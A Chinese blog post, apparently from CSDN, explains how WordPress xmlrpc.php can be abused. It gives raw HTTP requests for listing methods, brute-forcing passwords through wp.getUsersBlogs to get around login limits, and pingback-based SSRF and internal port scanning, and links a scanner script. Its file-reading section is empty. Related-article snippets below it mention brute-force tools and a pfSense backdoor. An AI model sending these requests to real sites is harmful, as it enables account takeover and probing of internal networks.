WordPress xmlrpc.php 漏洞利用

最新推荐文章于 2024-03-29 19:45:55 发布
最新推荐文章于 2024-03-29 19:45:55 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: # 漏洞原理 # 挖掘技巧 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/123853061
版权

WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以,你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时,XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。



0X01 激活XML-RPC
作者:wh1te8ea
链接:https://www.jianshu.com/p/42e3b065ad76
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

从3.5版本开始,XML-RPC功能默认开启。 早些版本,可通过如下方法激活:Settings > Writing > Remote Publishing and check the checkbox.

路径:http://example.com/wordpress/xmlrpc.php

0x02 查看系统允许的方法

 

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 

0x03 账号爆破

一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。
构造请求包:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

爆破成功会返回博客的内容:

 

 

0x03 SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
构造请求包:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

IP和端口存在,返回包中的<value><int>中的值大于0: 

利用脚本:
https://github.com/FireFart/WordpressPingbackPortScanner

0x04 读取文件:

 

 

yggcwhat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kraitnabo-xmlrpc:南博App - XmlRpc - 支持Typecho、WordPress
05-23
!>步骤1 下载XmlRpc文件 XmlRpc下载地址: 选择和你使用的南博版本一致,点击Source code进行下载 【typecho】 然后解压出XmlRpc.php文件 【wordpress】 然后解压出class-wp-xmlrpc-server.php文件 !>步骤2 替换XmlRpc文件 【typecho】 将XmlRpc.php上传至typecho目录下的var的Widget目录下(var与user同一级目录)。(/var/Widget/)替换原有xmlRpcwordpress】 将class-wp-xmlrpc-server.php 上传至wordpress目录下的wp-includes目录下(/wp-includes/)替换原有xmlRpc 附言 | 应和[南博]版本号相同使用。不同版本有不同功能和算法。 若遇到问题,请到 反馈,或者请博友帮助 !>步骤3 使用南
防止WordPress利用xmlrpc.php进行暴力破解以及DDoS
weixin_34005042的博客
09-18 959
早在2012 年 12 月 17 日一些采用 PHP 的知名博客程序 WordPress被曝光存在严重的漏洞,该漏洞覆盖WordPress 全部已发布的版本(包括WordPress 3.8.1)。该漏洞WordPress 扫描工具也在很多论坛和网站发布出来。工具可以利用 WordPress 漏洞来进行扫描,也可以发起DDoS 攻击。经过测试,漏洞影响存在 xmlrpc.php 文件的全部版本。...
Python `wordpress_xmlrpc` 模块概览
最新发布
Kevin12581的博客
03-29 1021
Python `wordpress_xmlrpc` 模块概览及用法示例
pfsense_xmlrpc_backdoor:通过 xmlrpc.php 在 pfSense 防火墙上放置 PHP 后门的简单示例
06-12
快速介绍 这是一个示例有效负载以及滥用 pfSense 的 xmlrpc.php 函数来建立后门并获得对 pfSense 防火墙的根级访问权限的示例。 这个漏洞是post-auth的(对于管理员账户),根据pfSense安全团队的说法,它被认为不是问题,因为这个密码是为web和ssh服务共享的(ssh在这个时候不能访问WAN被使用)。 此身份验证方法绕过适用于针对 Web 的身份验证尝试的安全规则,并被视为local_backed身份验证尝试。 任何被放到 web root 的 PHP shell 都将使用完整的 root 权限运行。 还值得注意的是,Web 服务器似乎是单线程的,因此启动长时间运行的 exec(例如循环或无计数的 ping)将有效地对 Web 服务器进行 DoS,并停止基于 Web 的身份验证和管理。 这是在 2015 年比赛中发现的,用于在团队防火墙上投放活动后门。
Wordpress-XMLRPC-Brute-Force-Exploit:Wordpress XMLRPC系统多方调用蛮力利用(0天)by 1N3 @ C​​rowdShield
02-05
1N3的Wordpress XMLRPC System Multicall蛮力利用漏洞,最近更新:20170215 关于: 这是对Wordpress xmlrpc.php系统多重调用功能的一种利用,影响了最新版本的Wordpress(3.5.1)。 该漏洞利用通过向xmlrpc.php发送每个请求1,000次以上的auth尝试来工作,以“强行”使用有效的Wordpress用户,并将遍历整个单词列表,直到获得有效的用户响应为止。 然后,它将有选择地获取并显示有效的用户名和密码以进行登录。 用法: ./wp-xml-brute http://target.com/xmlrpc.php pas
前端项目-jquery-xmlrpc.zip
09-03
前端项目-jquery-xmlrpc,使用Ajax与远程XML-RPC服务交互
xmlrpc.php 漏洞利用
墨痕诉清风的博客
10-10 7901
WordPress采用了接口.并且通过内置函数实现了该接口内容。所以,你可要通过客户端来管理Wordpress。通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端来发布你的WordPress日志和页面。同时,XML-RPC 也可使用插件来自定义你的规则。
WordPress:解决xmlrpc.php被扫描爆破的风险
极乐数据
12-01 952
利用宝塔规则优先级:UA白名单> UA黑名单> URL关键词拦截> IP白名单 > IP黑名单 > URL白名单 > URL黑名单 > CC防御 > 禁止境外IP访问 >User-Agent > URI过滤 > URL参数 > Cookie > POST。使用WordPress的朋友都知道,一些【垃圾渣渣】会利用xmlrpc.php文件来进行攻击,绕过WP后台错误登录次数限制进行爆破。设置好后,除了特定的UA访问,其他访问该文件都是403。我们可以直接删除xmlrpc.php文件中的代码。
WordPressxmlrpc.php完整指南(功能、安全风险、如何禁用)
如需功能开发提供开发说明,请发送邮件至[email protected]
06-18 1675
XML-RPC是支持WordPress与其他系统之间通信的规范。它通过使用HTTP作为传输机制和XML作为编码机制来标准化这些通信来实现此目的。XML-RPC早于WordPress:它出现在b2博客软件中,该软件于2003年创建了WordPress。该系统的代码存储在站点根目录下的xmlrpc.php文件中。即使XML-RPC在很大程度上已经过时,它仍然存在。在WordPress的早期版本中,默认情况下已关闭XML-RPC。但是从3.5版开始,默认情况下已启用它。
PHPXML-RPC使用笔记
Able
08-13 1636
PHP中集成了XML-RPC和SOAP两种Web Service通信两种协议标准,基本的思想就是使用基于XML的HTTP的远程调用提供一种标准的机制,而省去建立一种新协议的需求。其实这在实际开发应用中是非常实用,比如PC客户端或者现在流行的手机客户端需要同服务器端通信,这时候XML-RPC就是一个很好的解决办法。 这里记一下的PHP中如何使用XML-RPC的笔记,虽然这种方式运用的不多。
Ub.XMLRPC.rar_xmlrpc
09-22
xmlrpc 接口开发事例 c# web 开发接口代码,可以和其他接口对接
复现WordPress xmlrpc.php漏洞和SSRF
记录并分享学习安全的知识点..
04-02 1804
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 SSRF(服务器端请求伪造) SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为 它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定UR...
php xmlrpc
yihaoxue的博客
01-16 245
Web Service就是为了异构系统的通信而产生的,它基本的思想就是使用基于XML的HTTP的远程调用提供一种标准的机制,而省去建立一种新协议的需求。目前进行Web Service通信有两种协议标准,一种是XML-RPC,另外一种是SOAP。XML-RPC比较简单,出现时间比较早,SOAP比较复杂,主要是一些需要稳定、健壮、安全并且复杂交互的时候使用。PHP中集成了XML-RPC和SOAP两...
拯救xmlrpc.phpWordPress瘫痪的的六种办法
511遇见
09-03 4012
今天对于我来说是个战斗的日子,上午发布完文章后,很快3 add_filter('xmlrpc_enabled', '__return_false'); 60好搜就收录了,但在打开网页的时候,卡主了,没有反应,快速的重启Apache,马上恢复,但过了几分钟,网站又打不开,干脆重启服务器,问题得到解决,过了一会,悲剧再次发生,查看网站防护日志,原来有个IP不停的访问xmlrpc.php文件,造成服务器瘫痪,也就是说对方在放大型暴力猜解攻击,应该是传说中的xmlrpc暴力破解密码导致,原因在于使用的wo.
针对WordPressxmlrpc.php暴力破解攻防
秋̶᭄ꦿ攻城狮࿆ྂ
04-02 1688
绪论 通常wordpress登录接口都是做了防暴力破解防护的,利用xmlrpc.php提供的接口尝试猜解用户的密码,可以绕过wordpress对暴力破解的限制。xmlrpc.php或可导致拒绝服务 利用原理 Pingback 是三种类型的反向链接中的一种,当有人链接或者盗用作者文章时来通知作者的一种方法。可以让作者了解和跟踪文章被链接或被转载的情况。一些全球最受欢迎的 blog 系统,都支持 Pi...
wordpress xmlrpc.php 漏洞,关于WordPress xmlrpc.php Pingback缺陷与SSRF攻击
weixin_29207533的博客
03-10 796
前两天我因为web2hack.org挂了,而分析到原因,当时有些思路,想追踪下去,不过不明确,后来发现WordPress最新版3.5.1出来了,我看到官方说修补了几个安全问题(http://codex.wordpress.org/zh-cn:3.5.1_%E7%89%88%E6%9C%AC),其中有一条引起我的注意:通过Pingback实现的服务器端请求伪造 (Server-side reques...
php xmlrpc.dll木马_网站遭遇刷xmlrpc.php攻击,附解决办法。
weixin_42629671的博客
03-09 679
最近一个月,我的博客打开每个页面都是大白页(500错误),前台、后台都一样,刷新多次偶尔能成功打开一次。今天有闲时间,准备解决这个问题。从Direct Admin的日志里看到,博客被一个IP地址是 209.66.128.xxx 的机器,不断的在刷我的 xmlrpc.php,造成空间流量巨大,所以博客的页面很难打开。网上查了一下,解决刷 xmlrpc.php 这个问题的文章很少。我总结了一下,可以用...
WordPress XMLRPC安全漏洞
maverickpig的博客
01-23 4550
wordpress xmlrpc安全漏洞
xmlrpc.php 漏洞
06-01
XML-RPC 是一种远程过程调用(RPC)协议,它使用 XML 来编码其调用和响应消息。XML-RPC 协议中的一个漏洞xmlrpc.php 漏洞,这是一种常见的 Web 应用程序漏洞。 攻击者可以利用这个漏洞,将恶意代码注入到 xmlrpc.php 文件中,然后通过远程调用来执行这些恶意代码,从而获得对系统的控制权。攻击者可以使用这个漏洞来进行各种攻击,如代码执行、文件读取、SQL 注入、拒绝服务等。 要防止 xmlrpc.php 漏洞,应该采取以下措施: 1. 禁用 xmlrpc.php 文件,或者限制其访问权限。 2. 更新 Web 应用程序到最新版本,以修复潜在的漏洞。 3. 使用防火墙,限制对 xmlrpc.php 文件的访问。 4. 使用安全插件,如 Wordfence,以检测和防止攻击。 总之,保持 Web 应用程序的安全性是非常重要的,应该采取适当的措施来防止 xmlrpc.php 漏洞和其他潜在的安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值